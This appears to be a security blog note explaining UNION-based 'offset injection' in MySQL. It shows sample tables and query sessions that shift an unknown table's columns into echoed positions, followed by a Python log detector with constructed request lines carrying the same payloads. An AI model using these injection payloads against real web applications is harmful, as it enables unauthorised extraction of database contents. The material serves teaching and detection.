access.md
Today I saw an article on FreeBuf about shift-overflow injection (位溢注入); personally I feel it is not much different from offset injection.

Offset injection applies when:

- the target table's column names cannot be guessed, but a basic id column can be assumed to exist
- the currently injectable table has more columns than the target table

The two tables used in the experiment. The injectable user table:

```
+------+------+----------+-------+-------+---------+---------+------+
| id   | user | pass     | birth | phone | country | city    | time |
+------+------+----------+-------+-------+---------+---------+------+
|    1 | user | userpass | 1999  | 13177 | cn      | beijing |    9 |
+------+------+----------+-------+-------+---------+---------+------+
1 row in set (0.00 sec)
```

The target test table:

```
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test     | test     |
+----+----------+----------+
```

Assume here that every column of test except id holds highly random, unguessable characters. Then, because of how UNION SELECT works (the two select lists only have to agree on the number of columns, not their names), the following statements can be executed:

```
mysql> select * from user union select 1,2,3,4,5,test.* from test;
+------+------+----------+-------+-------+---------+---------+------+
| id   | user | pass     | birth | phone | country | city    | time |
+------+------+----------+-------+-------+---------+---------+------+
|    1 | user | userpass | 1999  | 13177 | cn      | beijing | 9    |
|    1 | 2    | 3        | 4     |     5 | 1       | test    | test |
+------+------+----------+-------+-------+---------+---------+------+
2 rows in set (0.00 sec)

mysql> select * from user union select 1,2,3,4,test.*,8 from test;
+------+------+----------+-------+-------+---------+---------+------+
| id   | user | pass     | birth | phone | country | city    | time |
+------+------+----------+-------+-------+---------+---------+------+
|    1 | user | userpass | 1999  | 13177 | cn      | beijing |    9 |
|    1 | 2    | 3        | 4     |     1 | test    | test    |    8 |
+------+------+----------+-------+-------+---------+---------+------+
2 rows in set (0.00 sec)

mysql> select * from user union select 1,2,test.*,test.* from test;
+------+------+----------+-------+-------+---------+---------+------+
| id   | user | pass     | birth | phone | country | city    | time |
+------+------+----------+-------+-------+---------+---------+------+
|    1 | user | userpass | 1999  | 13177 | cn      | beijing | 9    |
|    1 | 2    | 1        | test  | test  | 1       | test    | test |
+------+------+----------+-------+-------+---------+---------+------+
2 rows in set (0.00 sec)
```

What "shifting" means here is moving the contents of test.* step by step toward the front of the select list until they land in the columns whose data is echoed back. Seen this way, it is not much different from offset injection under Access; the only thing missing is the join that comes afterwards.
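As an added defensive example (not part of the original note), a small Python detector for the shape this technique leaves in web server access logs: a UNION SELECT whose select list is padded with constants and then expanded with a `table.*` wildcard. The log lines below are constructed samples, and the regexes assume a combined-log-format request line.

```python
import re
from urllib.parse import unquote_plus

# A UNION-based offset injection, as in the MySQL session above, pads the
# select list with constants and expands the unknown table with "table.*" so
# that its real columns slide into the positions the page echoes.
UNION_RE = re.compile(
    r"union\s+(?:all\s+)?select\s+(?P<cols>.+?)\s+from\s+(?P<tbl>\w+)", re.I | re.S)
WILDCARD_RE = re.compile(r"(?P<tbl>\w+)\.\*")
# Combined-log-format line: client ip, timestamp, request line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) HTTP/')

def analyze_query(qs):
    """Classify a URL-encoded query string: None, plain UNION, or UNION with table.* padding."""
    m = UNION_RE.search(unquote_plus(qs))
    if not m:
        return None
    cols = [c.strip() for c in m.group("cols").split(",")]
    wild_idx = [i for i, c in enumerate(cols) if WILDCARD_RE.fullmatch(c)]
    finding = {"items": len(cols), "source": m.group("tbl"),
               "offset_injection": bool(wild_idx)}
    if wild_idx:
        finding["target"] = WILDCARD_RE.fullmatch(cols[wild_idx[0]]).group("tbl")
        finding["padding"] = wild_idx[0]      # constants before the first table.*
        finding["wildcards"] = len(wild_idx)  # how many times table.* was repeated
    return finding

def scan_log(lines):
    """Return (client ip, finding) for every request whose query string matches."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        _, _, qs = m.group("path").partition("?")
        finding = analyze_query(qs)
        if finding:
            alerts.append((m.group("ip"), finding))
    return alerts

# Constructed sample log lines (not from the page): one benign request, the
# two padded UNION queries from the session above, and a plain UNION probe.
CONSTRUCTED_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /user.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2024:10:00:01 +0000] "GET /user.php?id=1+union+select+1,2,3,4,5,test.*+from+test HTTP/1.1" 200 780',
    '10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /user.php?id=1+union+select+1,2,test.*,test.*+from+test HTTP/1.1" 200 790',
    '10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /user.php?id=1+union+select+1,2,3,4,5,6,7,8+from+user HTTP/1.1" 200 512',
]
```

The `padding` value is the number of constants in front of the first `table.*`, i.e. the shift the request is trying, which is useful when correlating a series of probes from one client.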